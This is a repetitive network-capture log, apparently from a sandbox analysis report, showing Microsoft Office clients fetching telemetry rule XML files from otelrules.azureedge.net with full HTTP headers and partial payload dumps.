                                                                                x-azure-ref: 20241004T093409Z-15767c5fc55rg5b7sh1vuv8t7n0000000csg0000000019r8
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:09 UTC   1360                IN
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                Session ID   Source IP     Source Port   Destination IP   Destination Port
                                                                                106          192.168.2.5   55540         13.107.246.60    443
                                                                                Timestamp                 Bytes transferred   Direction   Data
                                                                                2024-10-04 09:34:10 UTC   192                 OUT         GET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:10 UTC   563                 IN          HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:10 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1427
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                ETag: "0x8DC582BE56F6873"
                                                                                x-ms-request-id: dc68e902-201e-006e-0d8c-15bbe3000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093410Z-15767c5fc55ncqdn59ub6rndq00000000bxg00000000a1cb
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:10 UTC   1427                IN
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                Session ID   Source IP     Source Port   Destination IP   Destination Port
                                                                                107          192.168.2.5   55537         13.107.246.60    443
                                                                                Timestamp                 Bytes transferred   Direction   Data
                                                                                2024-10-04 09:34:10 UTC   192                 OUT         GET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:10 UTC   563                 IN          HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:10 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1366
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                ETag: "0x8DC582BDB779FC3"
                                                                                x-ms-request-id: 0da95f5c-701e-0097-318c-15b8c1000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093410Z-15767c5fc55n4msds84xh4z67w000000061g000000004b19
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:10 UTC   1366                IN
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                108 | 192.168.2.5 | 55539 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:10 UTC | 192 | OUT | GET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:10 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:10 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1360
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                ETag: "0x8DC582BDD74D2EC"
                                                                                x-ms-request-id: 8be9c1e7-301e-0052-678c-1565d6000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093410Z-15767c5fc55gq5fmm10nm5qqr80000000cdg000000006pz9
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:10 UTC | 1360 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                109 | 192.168.2.5 | 55538 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:10 UTC | 192 | OUT | GET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:10 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:10 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1397
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                ETag: "0x8DC582BDFD43C07"
                                                                                x-ms-request-id: 704395e8-201e-005d-718c-15afb3000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093410Z-15767c5fc55jdxmppy6cmd24bn00000004p0000000001hn1
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:10 UTC | 1397 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                110 | 192.168.2.5 | 55541 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:10 UTC | 192 | OUT | GET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:10 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:10 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1390
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                ETag: "0x8DC582BE3002601"
                                                                                x-ms-request-id: 21dfe39b-001e-0049-468c-155bd5000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093410Z-15767c5fc55rg5b7sh1vuv8t7n0000000ckg000000009vu0
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:10 UTC | 1390 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                111 | 192.168.2.5 | 55547 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:11 UTC | 192 | OUT | GET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:11 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:11 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1401
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                ETag: "0x8DC582BE2A9D541"
                                                                                x-ms-request-id: 82f8cc24-c01e-0014-3a8c-15a6a3000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093411Z-15767c5fc552g4w83buhsr3htc0000000ceg000000000swx
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:11 UTC | 1401 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                112 | 192.168.2.5 | 55550 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:11 UTC | 192 | OUT | GET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:11 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:11 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1391
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                ETag: "0x8DC582BDF58DC7E"
                                                                                x-ms-request-id: 023e591f-a01e-003d-618c-1598d7000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093411Z-15767c5fc55gq5fmm10nm5qqr80000000chg000000001893
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:11 UTC | 1391 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                113 | 192.168.2.5 | 55551 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:11 UTC | 192 | OUT | GET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:11 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:11 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1354
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                ETag: "0x8DC582BE0662D7C"
                                                                                x-ms-request-id: 76253f94-c01e-0066-328c-15a1ec000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093411Z-15767c5fc55rv8zjq9dg0musxg0000000c7g00000000a2mg
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:11 UTC | 1354 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                114 | 192.168.2.5 | 55552 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:11 UTC | 192 | OUT | GET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:11 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:11 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1403
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                ETag: "0x8DC582BDCDD6400"
                                                                                x-ms-request-id: 819d4321-f01e-0020-6e8c-15956b000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093411Z-15767c5fc55jdxmppy6cmd24bn00000004gg0000000078sk
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:11 UTC | 1403 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                115 | 192.168.2.5 | 55548 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:11 UTC | 192 | OUT | GET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:11 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:11 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1364
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                ETag: "0x8DC582BEB6AD293"
                                                                                x-ms-request-id: ba3c7a68-301e-0099-698c-156683000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093411Z-15767c5fc554w2fgapsyvy8ua00000000bs000000000ab9k
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:11 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


Session ID | Source IP | Source Port | Destination IP | Destination Port
116 | 192.168.2.5 | 55562 | 13.107.246.60 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-04 09:34:13 UTC | 192 | OUT | GET /rules/rule703501v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-04 09:34:13 UTC | 563 | IN | HTTP/1.1 200 OK
Date: Fri, 04 Oct 2024 09:34:13 GMT
Content-Type: text/xml
Content-Length: 1399
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
ETag: "0x8DC582BE8C605FF"
x-ms-request-id: 831f1653-b01e-0098-198c-15cead000000
x-ms-version: 2018-03-28
x-azure-ref: 20241004T093413Z-15767c5fc554wklc0x4mc5pq0w0000000chg00000000bge4
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-04 09:34:13 UTC | 1399 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


Session ID | Source IP | Source Port | Destination IP | Destination Port
117 | 192.168.2.5 | 55564 | 13.107.246.60 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-04 09:34:13 UTC | 192 | OUT | GET /rules/rule701800v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-04 09:34:13 UTC | 563 | IN | HTTP/1.1 200 OK
Date: Fri, 04 Oct 2024 09:34:13 GMT
Content-Type: text/xml
Content-Length: 1366
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
ETag: "0x8DC582BEA414B16"
x-ms-request-id: a7582d38-101e-0028-528c-158f64000000
x-ms-version: 2018-03-28
x-azure-ref: 20241004T093413Z-15767c5fc55rv8zjq9dg0musxg0000000cbg000000004ehq
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-04 09:34:13 UTC | 1366 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


Session ID | Source IP | Source Port | Destination IP | Destination Port
118 | 192.168.2.5 | 55563 | 13.107.246.60 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-04 09:34:13 UTC | 192 | OUT | GET /rules/rule703500v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-04 09:34:13 UTC | 563 | IN | HTTP/1.1 200 OK
Date: Fri, 04 Oct 2024 09:34:13 GMT
Content-Type: text/xml
Content-Length: 1362
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
ETag: "0x8DC582BDF497570"
x-ms-request-id: 7585955c-001e-000b-518c-1515a7000000
x-ms-version: 2018-03-28
x-azure-ref: 20241004T093413Z-15767c5fc55whfstvfw43u8fp40000000cb000000000ba4x
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-04 09:34:13 UTC | 1362 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


Session ID | Source IP | Source Port | Destination IP | Destination Port
119 | 192.168.2.5 | 55557 | 13.107.246.60 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-04 09:34:13 UTC | 192 | OUT | GET /rules/rule703350v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-04 09:34:13 UTC | 563 | IN | HTTP/1.1 200 OK
Date: Fri, 04 Oct 2024 09:34:13 GMT
Content-Type: text/xml
Content-Length: 1366
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
ETag: "0x8DC582BDF1E2608"
x-ms-request-id: fb0d4061-601e-0050-198c-152c9c000000
x-ms-version: 2018-03-28
x-azure-ref: 20241004T093413Z-15767c5fc55tsfp92w7yna557w0000000ca0000000007a3h
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-04 09:34:13 UTC | 1366 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


Session ID | Source IP | Source Port | Destination IP | Destination Port
120 | 192.168.2.5 | 55566 | 13.107.246.60 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-04 09:34:13 UTC | 192 | OUT | GET /rules/rule701801v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-04 09:34:13 UTC | 563 | IN | HTTP/1.1 200 OK
Date: Fri, 04 Oct 2024 09:34:13 GMT
Content-Type: text/xml
Content-Length: 1403
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
ETag: "0x8DC582BDC2EEE03"
x-ms-request-id: 89fd357a-501e-008f-758c-159054000000
x-ms-version: 2018-03-28
x-azure-ref: 20241004T093413Z-15767c5fc55qkvj6n60pxm9mbw00000001f00000000073an
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-04 09:34:13 UTC | 1403 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


Session ID | Source IP | Source Port | Destination IP | Destination Port
121 | 192.168.2.5 | 55570 | 13.107.246.60 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-04 09:34:14 UTC | 192 | OUT | GET /rules/rule701050v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-04 09:34:14 UTC | 563 | IN | HTTP/1.1 200 OK
Date: Fri, 04 Oct 2024 09:34:14 GMT
Content-Type: text/xml
Content-Length: 1362
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
ETag: "0x8DC582BEB256F43"
x-ms-request-id: 757cff4f-401e-000a-528c-154a7b000000
x-ms-version: 2018-03-28
x-azure-ref: 20241004T093414Z-15767c5fc554w2fgapsyvy8ua00000000btg000000007bqm
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-04 09:34:14 UTC | 1362 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


Session ID | Source IP | Source Port | Destination IP | Destination Port
122 | 192.168.2.5 | 55569 | 13.107.246.60 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-04 09:34:14 UTC | 192 | OUT | GET /rules/rule701051v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-04 09:34:14 UTC | 563 | IN | HTTP/1.1 200 OK
Date: Fri, 04 Oct 2024 09:34:14 GMT
Content-Type: text/xml
Content-Length: 1399
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
ETag: "0x8DC582BE1CC18CD"
x-ms-request-id: a68e0dd8-f01e-0052-1d8c-159224000000
x-ms-version: 2018-03-28
x-azure-ref: 20241004T093414Z-15767c5fc55rv8zjq9dg0musxg0000000cf000000000016v
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-04 09:34:14 UTC | 1399 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                123192.168.2.55557213.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:14 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
